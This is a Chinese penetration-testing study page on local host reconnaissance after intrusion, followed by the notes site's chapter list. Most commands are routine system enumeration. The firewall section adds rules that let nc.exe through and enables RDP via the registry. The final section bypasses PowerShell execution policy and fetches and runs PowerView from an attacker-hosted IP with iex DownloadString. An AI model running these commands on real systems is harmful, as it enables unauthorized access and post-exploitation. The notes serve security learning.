[TOC]
## 目标
* 操作系统
* 系统版本
* 系统服务
* 系统端口
* 系统进程
* 系统补丁
* 内网IP地址段
* 系统权限
* 系统共享
* 网络连接
* 杀毒软件
* 用户角色
## 查看网络配置
Windows
~~~
ipconfig /all
~~~
Linux
~~~
ifconfig
~~~
## 查看操作系统信息
Windows
~~~
systeminfo | findstr OS
~~~
Linux
~~~
uname –a 或 cat /proc/version
~~~
## 查看安装的软件及版本
Windows
~~~
wmic product get name,version
~~~
Linux
~~~
dpkg –l :列出所有安装的文件和库
dpkg –l 软件名称 :列举安装的版本
~~~
## 查看本机服务信息
Windows
~~~
wmic service list brief 或 net start
~~~
Linux
~~~
service --status-all
~~~
## 查看进程列表
Windows
~~~
tasklist
~~~
Linux
~~~
ps –aux 或 ps –ef
~~~
## 查看启动信息
Windows
~~~
wmic startup get command,caption
~~~
Linux
~~~
dmesg
~~~
## 查看任务计划
Windows
~~~
at 或 schtasks
~~~
Linux
~~~
crontab -l
~~~
## 查看开机时间
Windows
~~~
net statistics workstation
~~~
Linux
~~~
cat /proc/uptimedate -d "$(awk -F. '{print $1}' /proc/uptime) second ago" +"%Y-%m-%d%H:%M:%S"
cat /proc/uptime| awk -F. '{run\_days=$1 / 86400;run\_hour=($1 %86400)/3600;run\_minute=($1 % 3600)/60;run\_second=$1 % 60;printf("系统已运行:%d天%d时%d分%d秒",run\_days,run\_hour,run\_minute,run\_second)}
~~~
## 查看用户列表
Windows
~~~
查看本即用户列表:net user
查看本地管理员信息:net localgroup administrators
查看当前在线用户:query user || qwinsta
~~~
Linux
~~~
查看所有用户: cat /etc/passwd
查看用户组: cat /etc/group
~~~
## 查看端口列表
Windows
~~~
netstat –ano
~~~
Linux
~~~
netstat –antpl
~~~
## 查看补丁列表
Windows
~~~
systeminfo
wmic qfe get caption,description,hotfixid,installedon
~~~
## 查看本机共享列表
Windows
~~~
net share
wmic share get name,path,status
~~~
## 查看路由表及ARP信息
Windows
~~~
route print
arp -a
~~~
Linux
~~~
arp –a
route
~~~
## 查看防火墙相关配置
~~~
• 查看防火墙配置: netsh firewall show config
• 打开防火墙配置: netsh advfirewall set allprofiles state on
• 关闭防火墙配置: netsh advfirewall set allprofiles state off
• 修改防火墙配置:允许程序入站
netsh advfirewall firewall add rule name= "pass nc" dir=in action=allow program="C:\\nc.exe"
• 允许指定程序出站 :
netsh advfirewall firewall add rule name= "out nc" dir=out action=allowprogram="C:\\nc.exe"
• 允许RDP(3389)端口放行:
netsh advfirewall firewall add rule name= "RemoteDesktop" protocol=TCP dir=in localport=3389 action=allow
~~~
## 查看注册表参数
~~~
REG QUERY 命令参数(注册表)
~~~
## 查看远程连接情况
~~~
• 查看远程连接端口是否更改:很多时候RDP协议端口容易被更改
reg query "HKEY\_LOCAL\_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\WinStations\\RDP-Tcp" /v PortNumber
• 打开远程桌面:
REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal" "Server /vfDenyTSConnections /t REG\_DWORD /d 0 /f
• 关闭远程桌面:
REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal" "Server /vfDenyTSConnections /t REG\_DWORD /d 1 /f
• 查看远程桌面开启状态:
REG query HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal" "Server /vfDenyTSConnections /t REG\_DWORD
~~~
## 查看当前用户权限
~~~
whoami
~~~
## 查看域信息
~~~
• ipconfig /all :查看网关地址、DNS的IP地址、域名、本即是否DNS服务器处于一个网段
• nslookup +域名 :解析出的域名服务器的IP地址和DNS服务器IP是否一致;
• systeminfo :确定用户的登陆域
• 判断是否在主域: net time /domain
• 查询当前登录域及登录用户信息: net config workstation
~~~
## 绕过powershell本地权限
能上传文件到服务器但没有权限不够 powershell的用法
~~~
powershell.exe -executionpolicy bypass "import-module .\powerview.ps1;get-netuser"
~~~
不能上传脚本到目标机器
~~~
1,能够访问到脚本
2,kali开启apche服务
3,文件复制到服务器根目录
4,chmod 777 /目录 给与最高权限
powershell.exe -exec bypass -nop -c "iex(New-ObjectNet.webClient).DownloadString('http://192.168.11.101/powerview.ps1');get-netuser"
~~~
- 基础学习
- HTML基础
- HTTP协议原理
- HTTP代理
- 一句话木马
- HTML
- 计算机硬件
- JS脚本学习
- Ajax
- jQuery
- 栈溢出原理
- PHP基础
- php基础
- PHP数组
- PHP函数
- PHP算法
- PHP文件操作
- PHP表单处理
- PHP会话技术
- PHP类和对象
- PHP类继承
- 序列化和反序列化
- PHP小马
- PHP正则表达式
- PHP信息采集
- PDO预处理
- MySQL
- MySQL简介
- MySQL基础
- MySQL常见函数
- MySQL查询方式
- MySQL内置函数
- PHP操作MySQL
- 实战项目
- kail学习
- 基础命令
- 常见目录
- 物理设备规则
- 文件类型
- 文件权限
- shell介绍
- 文件查看命令
- kail搜索命令
- 压缩与解压缩
- 系统命令
- 系统状态检测
- 用户与权限管理
- 重定向管道符
- vim编辑器
- 实训-将做好的网站上传到服务器
- 网络技术
- OSI参考模型
- TCP/IP协议
- 物理层
- 数据链路层
- ARP协议
- 网络层
- IP地址分类
- 传输层
- 三次握手四次挥手
- CA证书
- HTTP报文结构
- 常用端口
- top10漏洞学习
- WEB十大漏洞
- 工具学习
- 插件学习
- Burp Suite工具
- Webshell管理工具
- Goodle搜索语法
- Fofa搜索语法
- shodan搜索语法
- 搜索引擎原理
- 漏洞扫描
- 弱口令爆破学习
- 绕过前端验证进行爆破
- 绕过后端验证码
- 前端Token验证绕过
- 常用爆破工具
- kydra(九头蛇)
- 常见的爆破协议
- 无线渗透基础
- SqlServer注入
- SqlServer简介
- 函数介绍
- SqlServer联合注入流程
- SqlServer报错注入
- SqlServer执行系统命令
- SqlServer备份写入shell
- SqlServer OpenRowSet 转发利用
- SqlServer延时注入
- Oracle注入
- Oracle+JSP联合注入
- Oracle+JSP的utl_http.request反弹注入
- Oracle报错注入
- Oracle布尔盲注
- Oracle延时注入
- SQL注入攻击
- 常用函数及命令
- SQL注入原理
- SQL注入基础
- SQL注入类型
- SQL联合报错注入
- 常见的注入方式
- 联合注入的流程
- 如何判断闭合方式和注释
- 报错注入常用的函数
- MySQL使用手册
- SQL注入floor函数报错原理
- SQL注入xpath函数报错原理
- 其它报错类型
- 头部信息注入
- SQL注入盲注
- SQL盲注类型
- 布尔注入常用函数
- 布尔注入例子
- 时间盲注常用函数
- 时间盲注例子
- 其它类型注入
- 万能密码原理
- 堆叠注入
- JSON注入
- 二次注入
- 二次编码注入
- 宽字节注入
- DNSlog注入
- getshell
- 绕过方法
- 常见的绕过方法
- 大小写绕过
- 注释绕过
- 空格绕过
- 垃圾数据绕过
- 更换提交方式绕过
- 双写绕过
- HTTP参数污染绕过
- 等价函数绕过
- 绕过WAF
- 扫描绕过
- 漏洞发现
- 权限控制
- 绕过safedog
- 绕过云锁
- Sqlmap工具
- Sqlmap目录
- Sqlmap流程及支持方法
- Sqlmap常用语法
- 常用Sql语句
- MySQL提权方法
- 文件包含漏洞
- 文件包含漏洞原理
- 文件包含常用函数
- PHP的伪协议
- 常用方法
- 文件包含绕过
- XXE漏洞
- 什么是XML
- 什么是DTD
- XXE漏洞原理
- XXE漏洞利用
- 文件上传漏洞
- 文件上传漏洞的原理
- 常见的木马植入方式
- 木马变形
- 图片马
- 文件上传的校验流程
- 靶场笔记
- 搜索文件上传语法
- 解析漏洞
- 常用的绕过方法
- 编辑器漏洞
- 上传漏洞分类
- 常见的绕狗方式
- XSS漏洞
- XSS漏洞原理
- shell箱子反杀
- HTTPOnly
- XSS绕过
- 常见函数
- CSRF漏洞
- CSRF漏洞原理
- CSRF利用
- 探测是否存在CSRF
- SSRF漏洞
- SSRF漏洞原理
- SSRF危险函数
- SSRF绕过方法
- SSRF用一句话木马
- RCE远程代码/命令执行
- 什么是RCE
- 远程代码执行
- 远程命令执行
- 文件下载漏洞
- 反序列化漏洞
- PHP反序列化漏洞原理
- PHP常用的函数
- PHP例子
- 钓鱼攻击
- 邮件钓鱼的协议
- CORS漏洞
- 未授权访问漏洞
- 伪随机验证码数漏洞
- JSON劫持漏洞
- XPath注入攻击
- Python基础学习
- Python基础
- Python简介
- Python语法基础
- Python模块
- Python函数
- Python运算符
- 程序流程结构
- Python数据结构
- Python字符串
- Python算法
- Python多线程
- 概念
- 线程常用函数
- 线程开启步骤
- Python网络编程
- 网络编程原理
- socket()函数
- 网络编程思路
- PHP代码审计
- 审计思路步骤
- 常用工具
- 配置文件
- 危险函数及特殊函数
- 危险函数-文件操作函数
- 危险函数-其他函数
- PHP代码审计-命令注入
- PHP代码审计-文件包含
- PHP代码审计-任意文件读取
- 内网渗透
- 攻防模型
- 网络框架
- 内网基础概念
- 内网域内信息收集
- 内网本机信息收集
- 简历通讯隧道简介
- 隧道-端口转发
- 隧道-反弹shell
- 隧道-代理
- Metasploit代理
- 隧道-隐蔽隧道
- NAT内网穿透
- 内网渗透大纲
- 内网不能出网要怎么办
- 反弹shell 的方法
- 权限提升
- Windows提权
- webshell权限提升思路
- 本地提权方法
- 系统权限介绍
- 查找补丁方法
- MSF漏洞检测利用
- 可信任服务路径漏洞
- MSL文件提权
- 绕过UAC提权
- 令牌窃取
- zend提权
- 数据库提权
- Mssql弱口令提权
- UDF提权
- 开机启动项提权
- MOF提权
- 数据库提权步骤
- Linux提权
- 脏牛提权
- Ubuntu内核提权
- sudo溢出提权
- GNU C Library动态链接库$ORIGIN溢出提权
- 权限维持
- 隐藏克隆账户
- Shift后门
- Shift映像劫持后门
- 启动项后门
- 计划任务后门
- Linux密码获取与破解
- MSF后门
- 常见的后门技术
- 伪造票据
- 横向移动
- 横向移动介绍
- IPC连接
- 密码和哈希
- PTH-哈希传递
- 票据传递
- Kerberos协议域认证领域
- 伪造黄金票据
- 伪造白银票据
- 痕迹清理
- Windows日志
- Linux日志
- Web日志
- 应急响应
- 应急响应概述
- 安全产品介绍
- 入侵排查
- 入侵排查分类
- 基本信息排查
- 用户信息排查
- 启动项排查
- 计划任务排查
- 系统进程排查
- 服务排查
- 文件痕迹排查
- 日志分析排查(Windows)
- 日志分析排查(Linux)
- 日志分析排查(其它日志)
- 内存分析排查
- 流量分析排查
- 威胁情报排查
- 相关工具
- 应急常用工具
- 多引擎在线病毒扫描
- 病毒查杀软件
- 病毒清除工具
- 勒索病毒搜索引擎
- Webshell检测工具
- 在线沙箱
- 安全分析工具
- 应急响应-常见漏洞
- 勒索病毒
- 勒索病毒简介
- 勒索病毒-攻击步骤
- 勒索病毒-事件处置
- SSH爆破
- SSH简介
- SSH爆破-攻击步骤
- SSH爆破-事件排查
- SSH爆破-溯源分析
- SSH爆破-事件处置
- 挖矿木马
- 挖矿木马简介
- 挖矿木马-攻击步骤
- 挖矿木马-事件处理
- 挖矿病毒-事件抑制
- Webshell后门
- Webshell简介
- 事件处置
- 网页篡改
- 网页篡改简介
- 网页篡改-攻击步骤
- 网页篡改-事件处置
- DDOS攻击
- DDOS攻击简介
- DDOS攻击分类
- DDOS攻击工具
- DDOS-模拟攻击
- DDOS-事件处置
- 主机入侵-事件处置
- 睿眼沙箱系统
- 睿眼攻击溯源系统
- Webshell应急
- 异常外连
- JAVA相关
- JAVA框架介绍
- JAVA框架判断
- JAVA漏洞目录
- 常规漏洞
- JAVA-SQL注入
- JAVA-目录遍历
- JAVA-不安全遍历
- JAVA-逻辑越权
- 身份验证
- JWT令牌
- JWT简介
- JWT伪造攻击
- JWT密匙爆破
- JAVA反序列化
- T3协议
- JAVA反序列化原理
- JAVA代码审计
- fastjson利用
- 面试问题
- Log4j2
- log4j2原理
- log4g2攻击过程
- log4j2绕过方法
- CSRF和SSRF的区别
- 给你一个网站如何渗透
- 注射式攻击简介
- 浅析HTTPS中间人攻击与证书校验
- 漏洞信息
- PTT PTK的区别
- Kerberos协议
- 中间件常见漏洞
- 安全基线
- spring漏洞
- 渗透测试
- 渗透测试流程
- 信息收集
- 信息收集网站
- 渗透测试相关工具
- 溯源反击
- IP溯源
- 身份ID溯源
- 流量分析
- HTTP包分析
- SMB协议分析
- 冰蝎和蚁剑的流量特征
- Godzilla和冰蝎 免杀马方式
- fastjson流量特征
- phpstudy流量特征
- shrio流量特征
- struts2-045流量特征
- ThinkPHP流量特征
- Tomcat流量特征
- weblogic流量特征
- web目录扫描流量特征
- 钓鱼邮件分析
- APP渗透
- 获取数据
- 抓包设置
- APP漏洞扫描
- API接口